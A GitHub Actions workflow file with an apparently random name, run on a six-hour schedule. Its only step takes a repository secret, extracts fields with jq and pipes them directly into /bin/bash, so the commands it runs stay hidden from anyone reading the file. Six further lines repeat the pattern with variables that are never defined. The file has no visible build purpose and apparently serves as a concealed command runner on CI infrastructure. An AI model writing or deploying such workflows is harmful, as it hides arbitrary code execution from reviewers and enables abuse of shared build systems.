name: haoxiaozi4567
on:
  workflow_dispatch:
  schedule:
    - cron: '55 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haoxiaozi4567
        env:
          i4909: ${{ secrets.i4909 }}
        run: |
          echo $i4909 | jq -r .iptnb3 | /bin/bash
          echo $ufpa6 | jq -r .xx3725 | /bin/bash
          echo $ppa9647 | jq -r .h75 | /bin/bash
          echo $pz33 | jq -r .qz00832 | /bin/bash
          echo $gvl83 | jq -r .wwzsz8 | /bin/bash
          echo $o28145 | jq -r .h0 | /bin/bash
          echo $orrl1415 | jq -r .h929 | /bin/bash

